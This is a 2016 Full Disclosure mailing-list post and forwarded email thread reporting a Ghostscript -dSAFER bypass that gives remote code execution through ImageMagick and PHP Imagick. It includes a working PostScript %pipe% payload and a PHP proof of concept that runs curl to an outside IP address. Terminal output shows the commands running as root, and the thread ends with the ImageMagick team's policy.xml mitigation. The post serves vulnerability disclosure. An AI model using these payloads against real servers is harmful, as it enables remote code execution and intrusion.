Full Disclosure mailing list archives
Ghostscript sadbox bypass lead ImageMagick to remote code execution
From: redrain root <rootredrain () gmail com>
Date: Wed, 19 Oct 2016 15:37:32 +0800
recently I noticed Tavis Ormandy reporting a vulnerability about Ghostscript
-dSAFER mode could be ignored and lead to code execution, however no one
exploit it in a application. there is a simple discussion and exploit
about it.
Author: redrain, yu.hong () chaitin com
Date: 2016-10-17
Version: Ghostscript version > 1.6
ImageMagick(or other app) all version
Vendor Notified: 2016-10-18
ImageMagick allows to process files with external libraries (delegate). And
there are some delegate:
<delegate decode="eps" encode="pdf" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
"-sDEVICE=pdfwrite" "-sOutputFile=%o"
"-f%i""/>
<delegate decode="eps" encode="ps" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ps2write"
"-sOutputFile=%o" "-f%i""/>
<delegate decode="ps" encode="eps" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite"
"-sOutputFile=%o" "-f%i""/>
<delegate decode="ps" encode="pdf" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pdfwrite"
"-sOutputFile=%o" "-f%i""/>
all of these delegate have use the Ghostscript(gs) to handle "pdf to eps"
"ps to eps" "eps to ps" "pdf to ps", and all delegates have use a parameter
-f, this parameter can lead ghostscript to exec any command.
Ghostscript version: > 9.16
for example, the lastest ubuntu 16.10 ghostscript package version is 9.19,
any user use imagemagick in this system is vulnerable.
cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
convert rr.pdf eps:rr
root@redrain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.
And there is a interesting thing, Imagemagick will auto recognize the file
real format with the file header. and use correspond delegate to handle.
It also affects imagick.
PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)
.putdeviceparams
quit
EOF;
$thumb = new Imagick();
$thumb->readImageBlob($exploit);
Regards,
redrain
---------- Forwarded message ----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell () artifex com
Hi chris,
there is a vulnerability about Ghostscript, imagemagick security team
suggest me to post to your group
Regards,
redrain
Forwarded conversation
Subject: Re: Security Issue
------------------------
From: <vir.prudens.non.contra.ventum.mingit () imagemagick org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain () gmail com
We've seen this Ghostscript issue before and it was rerouted to the
Ghostscript
maintainers. And it looks like the flaw in Ghostscript might be fixed.
We're using Ghostcript 9.20 and we get:
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
/dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find device profile 'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' -g612x792 '-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d' '-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c showpage ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
/dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find device profile convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo mmand/3253. Until Ghostscript is upgraded under Ubuntu with the Ghostscript security patch, you can add a security policy to ImageMagick's policy.xml to prevent Postscript / PDF from being rendered: <policy domain="coder" rights="none" pattern="PS" /> <policy domain="coder" rights="none" pattern="EPS" /> <policy domain="coder" rights="none" pattern="PDF" /> Now we get convert -verbose rr.pdf eps:rr convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416. convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo mmand/3253. The ImageMagick Security Team ---------- From: redrain root <rootredrain () gmail com> Date: 2016-10-18 19:41 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org [image: 内嵌图片 1] root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf uid=0(root) gid=0(root) groups=0(root) + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 --version 9.20 root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# Regards, redrain ---------- From: redrain root <rootredrain () gmail com> Date: 2016-10-18 19:45 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org I guess u used the old gs version.? and this vulnerability affected version >9.16 Regards, redrain 2016-10-18 19:16 GMT+08:00 <vir.prudens.non.contra.ventum .mingit () imagemagick org>: ---------- From: <vir.prudens.non.contra.ventum.mingit () imagemagick org> Date: 2016-10-18 19:50 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org, rootredrain () gmail com redrain root <rootredrain () gmail com> wrote:
I guess u used the old gs version.? and this vulnerability affected version >9.16
We're using Ghostscript 9.20 which is > 9.16. ---------- From: redrain root <rootredrain () gmail com> Date: 2016-10-18 20:11 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org u can use tar zxf a.tar.gz cd sb ./a.sh then the command returns "uid=0(root) gid=0(root) groups=0(root)" Regards, redrain ---------- From: <vir.prudens.non.contra.ventum.mingit () imagemagick org> Date: 2016-10-18 21:08 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org, rootredrain () gmail com redrain root <rootredrain () gmail com> wrote:
[image: ???????????? 1] root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf uid=0(root) gid=0(root) groups=0(root) + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 --version 9.20 root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#
Its likely the patch was against Ghostscript in Fedora 25. As mentioned, in the mean time add a security policy to ImageMagick to prevent the use of Ghostscript. ---------- From: redrain root <rootredrain () gmail com> Date: 2016-10-18 21:19 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org the lastest ghostscript is downloaded in http://www.ghostscript.com/ download/gsdnld.html and i'm trying to reproduce this vuln in different distros, it works. so do u consider this is a valid <http://www.baidu.com/link?url=vaDUociPg8LBZyXflgyuNcr3M9njzrr-uFePUKarXS82DjxvGsJ_TeeeXLEBaOpoGIq1Vs7ZZALVaZ6Xu4YxM5H6-FgBiXtjhccxpZs6iXe> vulnerability? and another interesting thing is i try to exploit it in imagick, looks work well PoC: <?php $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd']; if ($command == '') { $command = 'id'; } $exploit = <<<EOF %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl 108.61.160.217:12344) .putdeviceparams quit EOF; $thumb = new Imagick(); $thumb->readImageBlob($exploit); Regards, redrain ---------- From: redrain root <rootredrain () gmail com> Date: 2016-10-18 21:38 GMT+08:00 To: 332746458 () qq com Regards, redrain ---------- From: <vir.prudens.non.contra.ventum.mingit () imagemagick org> Date: 2016-10-18 22:21 GMT+08:00 To: vir.prudens.non.contra.ventum.mingit () imagemagick org, rootredrain () gmail com redrain root <rootredrain () gmail com> wrote:
the lastest ghostscript is downloaded in http://www.ghostscript.com/download/gsdnld.html and i'm trying to
reproduce This appears to be a Ghostscript vulnerability. Post to the Ghostscript developers group. We can't fix a Ghostscript vulnerability and our only suggestion is an ImageMagick security policy that prevents the use of Ghostscript until the vulnerability is fixed in Ghostscript.
Attachment:
a.tar.gz
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Ghostscript sadbox bypass lead ImageMagick to remote code execution redrain root (Oct 19)